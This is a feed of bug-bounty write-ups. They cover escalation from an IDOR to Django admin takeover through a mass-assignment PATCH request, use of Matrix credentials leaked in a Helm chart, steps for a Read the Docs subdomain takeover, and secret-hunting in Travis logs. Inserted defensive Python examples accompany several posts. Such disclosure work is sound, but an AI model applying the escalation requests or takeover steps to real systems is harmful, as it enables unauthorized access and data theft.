tag:blogger.com,1999:blog-4999111958303936832024-03-13T08:36:36.473+05:30Shashank's Security BlogFinding security bugs for food.Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.comBlogger21125tag:blogger.com,1999:blog-499911195830393683.post-22957943215852833242020-11-03T20:31:00.003+05:302020-11-03T20:32:49.793+05:30From a 500 error to Django admin takeover <p>This bug is about a private target I was hunting. I passed all the subdomains to <a href="https://github.com/ffuf/ffuf" rel="nofollow" target="_blank">FFUF</a>, a fast directory brute-forcer written in Go. </p><p>Since there were no interesting 200 responses against my wordlist, I started checking the other response codes, like 302, 403, etc. </p><p>I noticed that one of the subdomains (call it sub.vulnerable.com) returned a 500 error for the endpoint </p><p>/api-docs/</p><p><br /></p><p>This was interesting because a random endpoint such as /anything returned 404. So I was fairly sure that /api-docs/ existed: the route was registered, but the handler was failing, most likely because it needed more privileges or a logged-in session.</p><p>I tried lots of methods, but nothing worked. So I went back to testing the main application. I signed up, and on a hunch refreshed the page in the other tab, which was /api-docs/.</p><p>To my surprise, I could now see the API docs, served as a Swagger UI. </p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-lR3xEV-EFhk/X34W4BuECUI/AAAAAAAAEnk/nnzRSYNB-tI9HeadRjnUqmEzfYo_aMWpwCLcBGAsYHQ/s2874/Screenshot%2B2020-10-08%2Bat%2B12.58.17%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="2874" height="108" src="https://1.bp.blogspot.com/-lR3xEV-EFhk/X34W4BuECUI/AAAAAAAAEnk/nnzRSYNB-tI9HeadRjnUqmEzfYo_aMWpwCLcBGAsYHQ/w640-h108/Screenshot%2B2020-10-08%2Bat%2B12.58.17%2BAM.png" width="640" /></a></div><br /><p>After seeing the admin API, I thought I had hit a goldmine. 
But that was not the case: none of the admin APIs worked for my account. So I started looking at the normal API endpoints. </p><p><br /></p><p>Two of the endpoints were interesting:</p><p>1. /api/panel/v1/users/{id}/</p><p>where {id} is an integer. I automated the request for IDs 1 to 100 and, by filtering the 200 responses, was able to fetch other users' email addresses, dates of birth, names, etc. (a classic IDOR).</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-6GxjmLy7WK4/X34Y4Hxr5KI/AAAAAAAAEnw/4X-5f2-WmPsp_HMHMY7uWjezpQzDCzlGQCLcBGAsYHQ/s1676/Screenshot%2B2020-10-08%2Bat%2B1.06.49%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="1676" height="190" src="https://1.bp.blogspot.com/-6GxjmLy7WK4/X34Y4Hxr5KI/AAAAAAAAEnw/4X-5f2-WmPsp_HMHMY7uWjezpQzDCzlGQCLcBGAsYHQ/w640-h190/Screenshot%2B2020-10-08%2Bat%2B1.06.49%2BAM.png" width="640" /></a></div><br /> 2. A similar endpoint, with the same leak, through the search functionality:<blockquote>/api/panel/v1/users/?page=1&page_size=1&search=cyberboy</blockquote><p><br /></p><p>I reported the bug, and the team asked me if I could raise the severity. </p><p>Challenge accepted!</p><p><br /></p><p>I started digging into the /api/panel/v1/users/{id}/ endpoint again</p><p>and noticed a JSON value in the response: "<span style="orphans: 2; white-space: pre-wrap; widows: 2;">is_staff:false</span>"</p><p>So it was easy to guess that the site has different roles. I wanted to know more about them, so I thought of looking at an admin account's privileges; the admins would most likely be some of the company's developers. 
It was easy to find the developers' names in public places, then pass each name to the search API and fetch their data if I got lucky.</p><p>When I did this, one of the names worked, and I got an admin account's information.</p><blockquote>/api/panel/v1/users/?page=1&page_size=1&search=NAME_OF_A_DEV_I_KNEW</blockquote><p><br /></p><p>Now I had a few more interesting role fields to look at. </p><blockquote><p>"is_superuser":true</p><p>"is_staff":true</p><p>"lms_role":"super_admin"</p></blockquote><div><br /></div><div>But again, how do I get into an admin account? I tried and failed. So I thought: what if I could modify my own account to have these privileges? The first thing I tried was a POST request with the above JSON to my own ID:</div><div><br /></div><blockquote><div>POST /api/panel/v1/users/{id}/ HTTP/1.1</div><div><br /></div><div>{</div><div>  "is_superuser": true,</div><div>  "is_staff": true,</div><div>  "lms_role": "super_admin"</div><div>}</div></blockquote><div><br /></div><div>Unfortunately, a 500 error.</div><div><br /></div><div>The next thing to try was the PATCH method, the verb a REST API normally uses for partial updates: </div><div><br /></div><blockquote><div>PATCH /api/panel/v1/users/{id}/ HTTP/1.1</div><div><br /></div><div>{</div><div>  "is_superuser": true,</div><div>  "is_staff": true,</div><div>  "lms_role": "super_admin"</div><div>}</div></blockquote><div><br /></div><div>I got 200 OK. 
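The PATCH worked because the handler got two things wrong at once: it let any authenticated user write to any user record (the same object-level authorization gap behind the ID enumeration earlier), and it applied every key of the JSON body to the model, privilege flags included (mass assignment). What follows is an added example, not code from this post or from the target application: a plain-Python model of the vulnerable handler beside a hardened one, using the field names from the JSON shown above. The user records, the ids, and the SELF_WRITABLE and PUBLIC_FIELDS sets are assumptions made for the demo.

```python
# Added example, not code from the post or from the target application.
# Plain-Python model of the vulnerable /api/panel/v1/users/{id}/ handler
# beside a hardened one. Field names follow the JSON quoted in the post;
# the records, ids and the two field sets below are assumptions for the demo.
from copy import deepcopy

PRIVILEGE_FIELDS = {"is_staff", "is_superuser", "lms_role"}
SELF_WRITABLE = {"name", "email", "dob"}   # assumed: what a user may edit on themselves
PUBLIC_FIELDS = {"id", "name"}             # assumed: safe to show to other users

# Constructed user table (ids and addresses are made up).
USERS = {
    1: {"id": 1, "name": "dev", "email": "dev@example.invalid", "dob": "1990-01-01",
        "is_active": True, "is_staff": True, "is_superuser": True,
        "lms_role": "super_admin"},
    42: {"id": 42, "name": "cyberboy", "email": "cyberboy@example.invalid",
         "dob": "1995-05-05", "is_active": True, "is_staff": False,
         "is_superuser": False, "lms_role": "student"},
}

# The body the post sends with PATCH.
ESCALATION_BODY = {"is_superuser": True, "is_staff": True, "lms_role": "super_admin"}


class Forbidden(Exception):
    """Raised where a real API would answer 403."""


def fresh_db():
    return deepcopy(USERS)


def vulnerable_patch(db, requester_id, target_id, body):
    """Behaviour the post observed: any authenticated user may PATCH any
    user record, and every key in the body is written to the model
    (mass assignment). requester_id is ignored entirely."""
    db[target_id].update(body)
    return db[target_id]


def hardened_patch(db, requester_id, target_id, body):
    """Same operation with the two missing checks."""
    requester = db[requester_id]
    # 1. Object-level authorization: your own record only, unless superuser.
    if target_id != requester_id and not requester["is_superuser"]:
        raise Forbidden("not your record")
    # 2. Allowlist of writable fields: privilege flags only for a superuser
    #    (a separate admin serializer, in Django REST Framework terms).
    allowed = set(SELF_WRITABLE)
    if requester["is_superuser"]:
        allowed |= PRIVILEGE_FIELDS
    rejected = sorted(set(body) - allowed)
    if rejected:
        raise Forbidden(f"fields not writable by this caller: {rejected}")
    db[target_id].update(body)
    return db[target_id]


def hardened_get(db, requester_id, target_id):
    """Closes the read-side IDOR: other users' records come back redacted,
    so enumerating ids 1..100 no longer yields e-mail addresses or DOBs."""
    record = db[target_id]
    if target_id == requester_id or db[requester_id]["is_staff"]:
        return dict(record)
    return {k: v for k, v in record.items() if k in PUBLIC_FIELDS}


def admin_login_allowed(user):
    """Mirrors Django's AdminSite.has_permission: is_active and is_staff.
    This is why the PATCH alone was enough to open /admin."""
    return bool(user["is_active"] and user["is_staff"])


def demo():
    """(admin access after the vulnerable PATCH, error from the hardened one)"""
    escalated = vulnerable_patch(fresh_db(), 42, 42, ESCALATION_BODY)
    before_fix = admin_login_allowed(escalated)
    try:
        hardened_patch(fresh_db(), 42, 42, ESCALATION_BODY)
        error = None
    except Forbidden as exc:
        error = str(exc)
    return before_fix, error


if __name__ == "__main__":
    print(demo())
```

In Django REST Framework terms the fix is a serializer whose Meta.read_only_fields lists is_staff, is_superuser and lms_role (with a separate serializer for admins), plus a permission class whose has_object_permission refuses requests for other users' records; the allowlist matters as much as the authorization check, because a user is always allowed to PATCH their own record.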
</div><div><br /></div><div>I logged into my account, and I was now staff and a superuser who could edit and modify content. </div><div><br /></div><div>My curiosity did not stop there, so I searched for "lms_role"; it turns out the application is a learning management system built on Django. So I just opened /admin, the Django admin site, and was greeted with "Welcome, Cyberboy." Django's admin lets in any active account with is_staff set, which I now had.</div><div><br /></div><div>Here we go... I am the admin now :)</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-yMP3i5kyPrI/X34csHKOPwI/AAAAAAAAEn8/_Jy-GUPLSBUy51Gr5i8dif4Wc1X8cxjYQCLcBGAsYHQ/s2558/Screenshot%2B2020-10-08%2Bat%2B1.22.59%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="228" data-original-width="2558" height="58" src="https://1.bp.blogspot.com/-yMP3i5kyPrI/X34csHKOPwI/AAAAAAAAEn8/_Jy-GUPLSBUy51Gr5i8dif4Wc1X8cxjYQCLcBGAsYHQ/w640-h58/Screenshot%2B2020-10-08%2Bat%2B1.22.59%2BAM.png" width="640" /></a></div><br /><div><br /></div><div>Mission accomplished!</div><div>I informed the team that I would like to stop here, and they agreed. </div><div><br /></div><div>Bounty reward: $3000</div><div><br /></div>Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com4tag:blogger.com,1999:blog-499911195830393683.post-46932540851770020902020-08-18T21:32:00.012+05:302020-08-18T21:59:05.313+05:30Escalating a GitHub leak to takeover entire organization I was hunting on a private program. One of the common things I do is look for leaked credentials on GitHub. I pay special attention to deleted files, because many people are not aware that just deleting a file doesn't remove it from the repository's history. 
<div><br /></div><div>One of the YAML files caught my attention. It was a Helm chart template for a Kubernetes Secret, and the defaults baked into the template turned out to be real credentials:<div><br /></div><blockquote>data:<br /> matrixbot-username: {{ .Values.matrixbot.username | default "some_leaked_username" | b64enc }}<br /> matrixbot-password: {{ .Values.matrixbot.password | default "some_leaked_password" | b64enc }}</blockquote><div><br /></div>Initially, I had no clue what these credentials were for, so I started searching for this "matrix" thing. <br />I stumbled upon https://matrix.org and realized it is a communication platform. <div><br /></div><blockquote>Matrix is an open-source project that publishes the Matrix open standard for secure, decentralized, real-time communication, and its Apache-licensed reference implementations.</blockquote><div><br /></div><div><div>So, here's the plan: find a client, try to log in, and see if I was lucky. I found a web-based client at https://app.element.io/#/login and attempted to log in, but it didn't work. <div><br /></div>I almost gave up, but then I noticed that there is an option to use a self-hosted server. 
That fit my theory: a DevOps engineer had probably used it for some automation, hence the YAML file, and so the server should be self-hosted.<div><br /></div>Now I had to find that server, and the most obvious step was to look at the subdomains. <br />There were multiple subdomains, and one that caught my attention was matrix.thewebsite.com<div><br /></div>Visiting the URL showed this, which was convincing enough that I was in the right place. </div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-A-S86-Sw0ZU/Xzv2ylOEV_I/AAAAAAAAElc/ATOKQMceYdAu9pt9UB7gdNpwRQxDK83GQCLcBGAsYHQ/s1500/matrix.png" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" data-original-height="1060" data-original-width="1500" src="https://1.bp.blogspot.com/-A-S86-Sw0ZU/Xzv2ylOEV_I/AAAAAAAAElc/ATOKQMceYdAu9pt9UB7gdNpwRQxDK83GQCLcBGAsYHQ/s640/matrix.png" width="640" /></span></a></div><div><br /></div>So, I visited https://app.element.io/#/login again, added the custom server, and entered the leaked username and password. To my surprise, I was in. 
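The template quoted above leaks because of a Helm idiom: `{{ .Values.x | default "literal" | b64enc }}` falls back to the literal whenever no values file overrides it, so for the chart to work without one the real credential has to be in the template, and b64enc only base64-encodes it on the way into the Secret. The scanner below is an added example, not code from this post or from the program's repository: it walks YAML text for that pattern and for pre-rendered Secret data: entries, whose base64 is encoding rather than encryption. The manifest it scans is constructed for the demo (the two placeholder values are the ones used above), and the credential-word heuristic is an assumption.

```python
# Added example, not code from the post. Finds hard-coded credentials in
# Kubernetes/Helm YAML text in the two forms the leaked template shows:
#  - a Helm `default "literal"` fallback on a .Values lookup, and
#  - a rendered Secret whose data: entries are plain base64.
# The sample manifest is constructed; the credential-word list is a heuristic.
import base64
import binascii
import re
from dataclasses import dataclass

KV = re.compile(r"^\s*([\w.-]+):\s*(.*?)\s*$")
HELM_DEFAULT = re.compile(r'\{\{\s*\.Values\.([\w.]+)\s*\|\s*default\s+"([^"]*)"(.*?)\}\}')
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
CRED_WORDS = ("pass", "secret", "token", "key", "user", "cred")   # assumed heuristic


@dataclass
class Finding:
    line_no: int
    kind: str              # "helm-default" or "base64-literal"
    key: str
    value: str             # the literal, decoded where it was base64
    credential_like: bool  # key or values path names a credential


def looks_like_credential(*names):
    return any(w in n.lower() for n in names for w in CRED_WORDS)


def decode_if_base64(value):
    """Decoded text if `value` is well-formed base64 of printable ASCII,
    else None, so ordinary words such as 'Opaque' are not reported."""
    if not B64_VALUE.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_manifest(text):
    findings = []
    in_data = False
    for line_no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if not raw[0].isspace():
            # Top-level key: remember whether we are inside a Secret's data block.
            in_data = raw.strip() in ("data:", "stringData:")
            continue
        m = KV.match(raw)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        helm = HELM_DEFAULT.search(value)
        if helm and helm.group(2):
            findings.append(Finding(line_no, "helm-default", key, helm.group(2),
                                    looks_like_credential(key, helm.group(1))))
            continue
        if in_data:
            decoded = decode_if_base64(value)
            if decoded is not None:
                findings.append(Finding(line_no, "base64-literal", key, decoded,
                                        looks_like_credential(key)))
    return findings


# Constructed sample: a Helm template for a Secret with baked-in defaults,
# plus one pre-rendered (base64) value committed alongside it.
_RENDERED_TOKEN = base64.b64encode(b"secret-token-12345").decode()
SAMPLE_MANIFEST = f"""apiVersion: v1
kind: Secret
metadata:
  name: matrixbot
type: Opaque
data:
  matrixbot-username: {{{{ .Values.matrixbot.username | default "some_leaked_username" | b64enc }}}}
  matrixbot-password: {{{{ .Values.matrixbot.password | default "some_leaked_password" | b64enc }}}}
  log-level: {{{{ .Values.matrixbot.logLevel | default "info" | b64enc }}}}
  api-token: {_RENDERED_TOKEN}
"""

if __name__ == "__main__":
    for f in scan_manifest(SAMPLE_MANIFEST):
        flag = "CREDENTIAL" if f.credential_like else "default"
        print(f"line {f.line_no}: {flag:10} {f.kind:15} {f.key} = {f.value!r}")
```

Run it over `git log -p --all` output as well as the working tree, because, as the takeaway below says, a deleted file is still in history; a non-credential default such as log-level is reported too but not flagged, which keeps the output honest about what is merely a default and what is a secret.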
<div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GnyYPcpp9Pk/Xzv45-Ee5dI/AAAAAAAAElo/KpxEIkWboNsNfn8XXO8PK16YO8W7snqpACLcBGAsYHQ/s2112/matrix3.png" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black;"><img border="0" data-original-height="294" data-original-width="2112" src="https://1.bp.blogspot.com/-GnyYPcpp9Pk/Xzv45-Ee5dI/AAAAAAAAElo/KpxEIkWboNsNfn8XXO8PK16YO8W7snqpACLcBGAsYHQ/s640/matrix3.png" width="640" /></span></a></div><div><br /></div>Once logged in, I understood the credentials belonged to a Matrix bot. There was a hell of a lot of information, like Grafana passwords, server logs, private keys, etc., in the channel descriptions themselves. However, I immediately logged out and filed a report. <div><br /></div>Reward: $4000<div><br /></div><br /><br />Takeaway for hackers:<br />- Do not give up or conclude too early. Try and research more. <br />- Try to escalate leaks, but with caution. 
Do not go very deep.<div><br /></div>Takeaway for companies:<br />- Purge the file from the repository's history; just deleting it in a new commit doesn't work.<br />- Implement 2FA for all accounts.<div><br /></div>Timeline:<br />7th Aug: Filed the report.<br />7th Aug: Bug was fixed by removing the file as well as rotating the credentials. Additionally, 2FA was implemented.<br />11th Aug: $4000 bounty reward. <div><br /></div></div>Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-68670707578185149312020-07-21T04:45:00.007+05:302020-07-21T04:50:31.241+05:30Subdomain Takeover using readthedocs <div dir="ltr" style="text-align: left;" trbidi="on">
Hello World!<br />
<br />
Not a fancy blog post, but I just discovered that a subdomain takeover is possible via "readthedocs".<br />
<br />
What is a subdomain takeover?<br />
It is best explained here. <a href="https://github.com/EdOverflow/can-i-take-over-xyz">https://github.com/EdOverflow/can-i-take-over-xyz</a><br />
<br />
What is "readthedocs"?<br />
Read the Docs is a free, open-source documentation hosting platform. It builds and hosts documentation written with the Sphinx documentation generator.<br />
<br />
How do I check for a subdomain takeover?<br />
<br />
Any subdomain whose DNS points at Read the Docs but which no project there has claimed throws an error like the one in the screenshot below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-GHC2YYbH3-s/XxYiwVer2zI/AAAAAAAAEj8/QdAw3yFuWLIgcyHYIYwkzPm_3K_x2wYXACLcBGAsYHQ/s1600/Screenshot%2B2020-07-21%2Bat%2B4.20.45%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="660" data-original-width="1600" height="264" src="https://1.bp.blogspot.com/-GHC2YYbH3-s/XxYiwVer2zI/AAAAAAAAEj8/QdAw3yFuWLIgcyHYIYwkzPm_3K_x2wYXACLcBGAsYHQ/s640/Screenshot%2B2020-07-21%2Bat%2B4.20.45%2BAM.png" width="640" /></a></div>
<br />
<br />
<br />
How to take over?<br />
1. Sign up at <a href="https://readthedocs.org/">https://readthedocs.org</a> and go to the project's Admin settings.<br />
2. Use the repository <a href="https://github.com/readthedocs/template.git">https://github.com/readthedocs/template.git</a>, or fork it if you wish to make any changes.<br />
3. Enter that repository under "Repository URL:"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-4HnwjaVmvVg/XxYkHt2Te6I/AAAAAAAAEkI/vOS-l6btProueM8dHgEddhF_OCJugbgGACLcBGAsYHQ/s1600/Screenshot%2B2020-07-21%2Bat%2B4.38.55%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1108" data-original-width="1600" height="441" src="https://1.bp.blogspot.com/-4HnwjaVmvVg/XxYkHt2Te6I/AAAAAAAAEkI/vOS-l6btProueM8dHgEddhF_OCJugbgGACLcBGAsYHQ/s640/Screenshot%2B2020-07-21%2Bat%2B4.38.55%2BAM.png" width="640" /></a></div>
<br />
<br />
4. Click on "Domains" in the Admin settings and add the target subdomain.<br />
<br />
<br />
<br />
<br />
Takeover!<br />
<br />
P.S. I wrote this post because I didn't find readthedocs mentioned at <a href="https://github.com/EdOverflow/can-i-take-over-xyz">https://github.com/EdOverflow/can-i-take-over-xyz</a><br />
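Added example, not part of the original post: a small checker that applies the test above to a list of subdomains, so the condition "points at Read the Docs but unclaimed" can be scanned for rather than eyeballed. It assumes that custom domains on Read the Docs are CNAME records to readthedocs.io (as its custom-domain documentation instructs) and that an unclaimed domain serves the error page shown in the screenshot; the distinctive text of that page is passed in as fingerprint rather than reproduced here. DNS and HTTP are injected as functions so the check runs offline; the answers in the demo are constructed.

```python
# Added example, not part of the original post. Flags subdomains whose
# CNAME points at Read the Docs while no project there has claimed them.
# Assumptions: custom domains are CNAMEs to readthedocs.io, and an unclaimed
# domain answers with an error page containing `fingerprint` (copy that text
# from the page in the screenshot; it is not reproduced here).
from dataclasses import dataclass
from typing import Optional

RTD_ZONE = "readthedocs.io"   # assumed CNAME target for custom domains


@dataclass
class Result:
    host: str
    cname: Optional[str]
    status: str   # "takeover-candidate", "claimed", "not-rtd" or "no-cname"


def points_to_rtd(cname):
    """True when the CNAME target is readthedocs.io or a name under it."""
    if not cname:
        return False
    c = cname.lower().rstrip(".")
    return c == RTD_ZONE or c.endswith("." + RTD_ZONE)


def check_hosts(hosts, resolve_cname, fetch, fingerprint):
    """resolve_cname(host) -> CNAME target or None;
    fetch(host) -> (status_code, body) for https://host/.
    Only hosts that really point at Read the Docs get an HTTP request."""
    results = []
    for host in hosts:
        cname = resolve_cname(host)
        if cname is None:
            results.append(Result(host, None, "no-cname"))
            continue
        if not points_to_rtd(cname):
            results.append(Result(host, cname, "not-rtd"))
            continue
        _code, body = fetch(host)
        status = "takeover-candidate" if fingerprint in body else "claimed"
        results.append(Result(host, cname, status))
    return results


# Constructed DNS and HTTP answers for the demo (no real hosts involved).
UNCLAIMED_TEXT = "UNCLAIMED-DOMAIN-PLACEHOLDER"   # stand-in for the real error text
FAKE_DNS = {
    "docs.example.invalid": "readthedocs.io.",
    "old-docs.example.invalid": "readthedocs.io.",
    "www.example.invalid": "cdn.example.invalid.",
    "api.example.invalid": None,
}
FAKE_HTTP = {
    "docs.example.invalid": (200, "<html>Project docs</html>"),
    "old-docs.example.invalid": (404, f"<html>{UNCLAIMED_TEXT}</html>"),
}


def demo():
    return check_hosts(FAKE_DNS, FAKE_DNS.get,
                       lambda h: FAKE_HTTP.get(h, (0, "")), UNCLAIMED_TEXT)


if __name__ == "__main__":
    for r in demo():
        print(f"{r.host:28} {r.cname or '-':24} {r.status}")
```

For a live scan, plug in a resolver built on dnspython (dns.resolver.resolve(host, "CNAME") and the answer's target) and a fetcher built on requests.get with a timeout; the only signal worth trusting is the fingerprint on a host whose CNAME really lands in readthedocs.io, since an error page alone can have many other causes.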
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com1tag:blogger.com,1999:blog-499911195830393683.post-18475965389120810982019-05-18T21:26:00.000+05:302019-08-17T15:43:50.191+05:30Finding leaks in Travis logs- an automated approach<div dir="ltr" style="text-align: left;" trbidi="on">
First of all, I would like to give credit to the original researchers who brought this issue to public attention.<br />
The original blog post can be accessed through this link<br />
<a href="https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/">https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/</a><br />
<br />
I used their ideas to write a tool that automates the entire process and finds potential leaks.<br />
The tool can be found here.<br />
<a href="https://github.com/Shashank-In/TravisLeaks"><b>https://github.com/Shashank-In/TravisLeaks</b></a><br />
<br />
What is Travis?<br />
Travis CI is a hosted continuous integration service used to build and test software projects hosted on GitHub.<br />
<br />
Travis is free for open-source projects, but the entire build log of such projects remains public. This opens a door for malicious actors to harvest API keys, passwords, etc. from organizations with public Travis logs.<br />
<br />
Travis, in 2015, acknowledged that their API was being misused to find sensitive keys, and started hiding potentially sensitive data in logs by replacing it with [secure]. But was that enough?<br />
<br />
Ed, in his research, had already listed common keywords in Travis logs that could leak sensitive data. But while looking for those keywords, I realized most of their values had been replaced with [secure] by Travis. It seems Travis masks values based on a fixed list of known variable names.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-QqD9os5JMSQ/XOAnBvlL6iI/AAAAAAAAEXw/4KzS5cgOmhwBQybYfKEs5-Zj6LxPrsFbACLcBGAs/s1600/Screenshot%2B2019-05-18%2Bat%2B21.08.11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="466" data-original-width="1300" height="227" src="https://4.bp.blogspot.com/-QqD9os5JMSQ/XOAnBvlL6iI/AAAAAAAAEXw/4KzS5cgOmhwBQybYfKEs5-Zj6LxPrsFbACLcBGAs/s640/Screenshot%2B2019-05-18%2Bat%2B21.08.11.png" width="640" /></a></div>
<br />
<br />
So the plan was to look for keywords from Ed's list and, additionally, use entropy to find possible API keys. This seemed the right approach because it was not easy to come up with more keywords.<br />
<br />
For example, GITHUB_TOKEN is apparently on that list, as can be seen above. What if the variable is named TSD_GITHUB_TOKEN instead? Difficult to guess, but a long random value still stands out by its entropy, so an entropy check can find the possible leak.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-ZpwzybeCkZw/XOAoTNtxy1I/AAAAAAAAEX4/1QB49JJlkIgB-hre4_qnpfddalGVsRr4ACLcBGAs/s1600/Screenshot%2B2019-05-18%2Bat%2B21.06.44.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="1600" height="136" src="https://2.bp.blogspot.com/-ZpwzybeCkZw/XOAoTNtxy1I/AAAAAAAAEX4/1QB49JJlkIgB-hre4_qnpfddalGVsRr4ACLcBGAs/s640/Screenshot%2B2019-05-18%2Bat%2B21.06.44.png" width="640" /></a></div>
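Added example, not the TravisLeaks tool's own code: it applies the two ideas above to raw build-log lines. A keyword match on variable names skips assignments Travis has already replaced with [secure], and a Shannon-entropy test on long hex- or base64-looking tokens catches a renamed variable such as TSD_GITHUB_TOKEN that no keyword list knows about. The keyword list is an assumption standing in for Ed's list, the thresholds (3.0 bits for hex, 4.5 for base64, minimum 20 characters) follow the convention popularised by truffleHog, and the log lines are constructed.

```python
# Added example, not the TravisLeaks tool's code. Keyword list is assumed;
# thresholds follow the truffleHog convention; SAMPLE_LOG is constructed.
import math
import re
from collections import Counter
from dataclasses import dataclass

MASK = "[secure]"
KEYWORDS = ("token", "secret", "password", "passwd", "api_key", "apikey",
            "aws_access", "private_key")
HEX_CHARS = set("0123456789abcdefABCDEF")
B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=_-")
MIN_LEN = 20
HEX_THRESHOLD, B64_THRESHOLD = 3.0, 4.5
TOKEN_SPLIT = re.compile(r"""[\s='"]+""")


@dataclass
class Finding:
    line_no: int
    line: str
    reasons: list


def shannon_entropy(s):
    """Bits per character of the string's empirical character distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def keyword_hits(line):
    """Keywords seen in assignments whose value Travis did not mask."""
    hits = []
    for segment in line.split():
        if MASK in segment:
            continue          # Travis already redacted this assignment
        lowered = segment.lower()
        hits += [k for k in KEYWORDS if k in lowered and k not in hits]
    return hits


def high_entropy_tokens(line):
    """(token, entropy) for long tokens drawn from a hex or base64 alphabet
    whose entropy exceeds the threshold for that alphabet."""
    found = []
    for tok in TOKEN_SPLIT.split(line):
        if len(tok) < MIN_LEN:
            continue
        chars = set(tok)
        if chars <= HEX_CHARS:
            threshold = HEX_THRESHOLD
        elif chars <= B64_CHARS:
            threshold = B64_THRESHOLD
        else:
            continue          # URLs, paths and prose contain other characters
        entropy = shannon_entropy(tok)
        if entropy >= threshold:
            found.append((tok, round(entropy, 2)))
    return found


def scan_log(lines):
    findings = []
    for line_no, line in enumerate(lines, 1):
        reasons = [f"keyword:{k}" for k in keyword_hits(line)]
        reasons += [f"entropy:{tok}({e})" for tok, e in high_entropy_tokens(line)]
        if reasons:
            findings.append(Finding(line_no, line, reasons))
    return findings


# Constructed sample of what a public Travis log can contain.
SAMPLE_LOG = [
    "$ export GITHUB_TOKEN=[secure]",
    "$ export TSD_GITHUB_TOKEN=a91f0c3e7b2d4f6a8c5e1b3d7f9a0c2e4b6d8f1a",
    "$ git clone https://github.com/example/project.git",
    "Installing dependencies from requirements.txt",
    "$ export SLACK_WEBHOOK_URL=[secure]",
    "$ export DB_PASSWORD=hunter2",
]


def demo():
    return scan_log(SAMPLE_LOG)


if __name__ == "__main__":
    for f in demo():
        print(f"line {f.line_no}: {', '.join(f.reasons)}")
```

The two checks are complementary: the renamed token on line 2 is caught by both, while DB_PASSWORD=hunter2 on line 6 is far too short and regular for entropy and is caught only by the keyword rule, so dropping either check loses real findings.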
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com2tag:blogger.com,1999:blog-499911195830393683.post-73836316188294011192019-03-13T00:36:00.000+05:302019-08-17T15:04:25.907+05:30Taking Over Publicly Editable Github Wiki in Masses <div dir="ltr" style="text-align: left;" trbidi="on">
Let's get familiar with a few things first!<br />
<br />
What is Github?<br />
GitHub is a web-based hosting service for version control using Git. Github is quite popular for its efficient service and hence all big companies like Google, Facebook, Microsoft, etc. use it for their open-source projects.<br />
<br />
Any GitHub repository can have a "wiki". The wiki is generally used for documentation, installation instructions, etc.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-LR9mKNvzzNQ/XGMTKcQ8KZI/AAAAAAAAET4/CoixdZHg15Mb9uc8e4TTqwjkb4HP9Y-twCLcBGAs/s1600/Screenshot%2B2019-02-13%2Bat%2B00.10.06.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="443" data-original-width="1600" height="177" src="https://1.bp.blogspot.com/-LR9mKNvzzNQ/XGMTKcQ8KZI/AAAAAAAAET4/CoixdZHg15Mb9uc8e4TTqwjkb4HP9Y-twCLcBGAs/s640/Screenshot%2B2019-02-13%2Bat%2B00.10.06.png" width="640" /></a></div>
<br />
<br />
<br />
With a certain setting, an organisation or a user can allow any GitHub user (not only collaborators) to edit the wiki. In my opinion, this is a bad option to enable.<br />
<br />
If not watched closely, a malicious user can edit or publish a wiki page on a company's official GitHub repository and mislead the community or the users following the repo into downloading or installing malware, vulnerable libraries, etc.<br />
<br />
This can be an excellent catalyst for attackers who infect users through typosquatted malicious libraries they host: an innocent user will follow the wiki instructions blindly, especially if the wiki lives on a popular organization's GitHub repo.<br />
<br />
This is generally considered a low-priority security issue. But let's look at the bigger picture.<br />
<br />
According to GitHub, there are around 96 million repositories and 2.1 million organizations. Even with a success rate of 0.1%, an attacker can publish malicious content on 96,000 wiki pages.<br />
<br />
<br />
